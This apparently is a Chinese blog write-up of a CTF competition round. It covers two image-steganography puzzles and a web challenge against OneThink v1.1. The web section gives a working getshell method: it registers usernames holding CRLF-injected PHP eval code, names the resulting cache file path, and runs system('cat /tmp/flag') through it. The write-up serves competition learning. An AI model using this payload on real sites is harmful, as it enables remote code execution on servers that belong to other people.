巅峰极客第一场CTF部分writeup
额,上午驾校学车,中午打了会儿安恒的月赛,就来看巅峰极客的题了。时间关系实力原因没做几个emmmm太菜了wa
MISC-warmup-100pt
拿到一个bmp文件,套路走一波,右键查看属性emmm啥都没有。
丢到winhex里面也没有什么明显的提示或者信息。
放大招:stegsolve。放在各个颜色通道里面过一遍。
可以明显的看到每个颜色通道的最低位有异常数据。
将数据提取出来
前两个ook解码,第三个brainfuck解码之后拼接起来就是flag。
在线解密网址:https://www.splitbrain.org/services/ook
flag{db640436-7839-4050-8339-75a972fc553c}
MISC-LOLI-150pt
拿到一张文件后缀是png但是实质是jpg的图片。看起来像是二维码。扫一下发现:
tips:255
255是啥意思呢?当时就想到最低位,像素点之类的词汇。放到stegsolve里面跑一下也没发现什么端倪。
最后题目给出提示:0xff
这里有点脑洞了,将图片转16进制和0xff异或,也就是将图片的16进制取反。
这里我直接用winhex的异或功能,《用winhex进行一步异或》
然后可以找到里面有一张小png图片,最后还有一个black and wihite 的字符串。
图片由黑点和白点组成。但是就想到了二进制,像素点再转为二进制再转ascii码.
flag{e0754197-e3ab-4d0d-b98f-96174c378a34}
WEB-simple cms-300pt
OneThink v1.1的洞。利用点是缓存文件getshell。他会把成功登陆的用户名记录在一个缓存文件中,这里会导致被getshell。
百度做题233333333
https://www.google.com.hk/search?safe=strict&ei=zXlUW__pN8HO0gTcipOoDg&q=onethink+%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91+getshell&oq=onethink+%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91+getshell&gs_l=psy-ab.3...25667.31353.0.31641.21.18.2.0.0.0.419.2617.0j6j5j0j1.12.0....0...1c.1.64.psy-ab..9.1.418...0i30k1.0.YJKBf-VnArQ
这里有几个关键点。
a:缓存文件路径。
b: 用户注册成功并成功登陆。
c:注册登陆须每次抓包url解码后再发包回去
参考链接:http://www.admintony.com/AWD%E8%A5%BF%E7%9F%B3%E6%B2%B9%E7%BA%BF%E4%B8%8B%E8%B5%9B%E6%80%BB%E7%BB%93.html
第一点:扫目录得到www.zip下载源码,本地搭起来环境之后得到目录:/Runtime/Temp/onethink_6d11f0be3af9c28d4120c8fd5fe65a40.php
第二点:注册两个用户 %0d%0a$x=$_GET[X];//和%0d%0aeval($x);//
第三点:每次注册和登陆在发包的时候URL-encode 必须勾选上再提交,否则会把换行符的url-encode当成字符串来处理。登陆的时候也需要抓包,在用户名前面加上换行符的URL-encode,且勾选上URL-encode
getshell拿flag。
payload:/Runtime/Temp/onethink_6d11f0be3af9c28d4120c8fd5fe65a40.php?X=system('cat /tmp/flag');
巅峰极客第一场CTF部分writeup相关推荐
- 2018巅峰极客writeup(Misc)
原文地址:https://mistsatan.github.io/articles/2018-Peakgeek-Writeup-Misc.html 作为一个渣渣,带着去看各路神仙打架的想法报名了这次的 ...
- 2022巅峰极客WriteUp By EDISEC
2022巅峰极客WriteUp By EDISEC Web babyweb ezWeb Crypto point-power strange curve Pwn Gift smallcontainer ...
- 巅峰极客pwn wp
Pwn gift 程序保护全开 程序功能: add:最多只能申请十次堆块,每次申请大小为0x60或0x100,往里写内容的时候是往user_data+0x10处写. delete:有UAF show: ...
- 巅峰极客2022wp
巅峰极客2022 文章目录 巅峰极客2022 web babyweb ezWeb web babyweb 提示cbc padding oracle攻击,这是一个服务端的密码学漏洞,buu上做过原题[N ...
- 巅峰极客2022初赛 部分题解
文章目录 Crypto point-power strange curve Misc easy_Forensic Lost 巅峰极客2022初赛,团队共解决7道题,合计2234分,排名第11位,晋级复 ...
- 2020巅峰极客wp
2020巅峰极客 巅峰极客是给开封市信网办做护网的时候打的比赛,所以比赛体验感并不好,简单写一下wp virus-re 代码分为三部分 以'-'为间隔,将flag的第一部分转换为整型数字,并且满足后项 ...
- [代码审计][PHAR]巅峰极客babyphp2学习压缩过滤器触发phar
前言:我要当赛棍!!! 文章目录 序列化与反序列化 基本介绍 PHP反序列化漏洞原理 常用的魔法函数 __wakeup()绕过:CVE-2016-7124 __set:巅峰极客babyphp2 解决p ...
- CTF-i春秋网鼎杯第一场misc部分writeup
CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...
- 2020 巅峰极客 Re部分WriteUp
virus 附件下载:https://wwa.lanzous.com/iZh5tgy9gbg 代码分为三部分 以'-'为间隔,将flag的第一部分转换为整型数字,并且满足后项-前项分别为[0x13,0 ...
最新文章
- 智能车竞赛技术报告 | 单车拉力组 - 沈阳航空航天大学 - 青梅绿茶队
- ubuntu 配置apt代理源
- StringBuffer的用法
- adb logcat 保存_adb命令——日志命令详解——全部输出到桌面: adb logcat c:\users\del\desktop\log.txt...
- bzoj2007: [Noi2010]海拔
- Composite(组合)--对象结构型模式
- 提升服务器性能的建议
- 底部显示水平滚动_LG专利展示带有可滚动显示屏和触控笔的智能手机
- Android——ImageView报错:不是可绘制对象(颜色或路径)
- excel 快速比对两列数据差异
- hashmap经典面试问题以及答案
- 安装wordpress时Error establishing a database connection
- T1076 正常血压(信息学一本通C++)
- 一个女孩写给一个男孩子的信
- RBG三颜色填格子(非DP实现)
- Flash cs3无法编译(无法影片预览)
- 加速GitHub访问速度
- 《无声告白》 读书笔记
- 程序员的十年工作创业血泪史,万字长文,仔细读完,受益匪浅
- jQuery在线选座,jQuery选座系统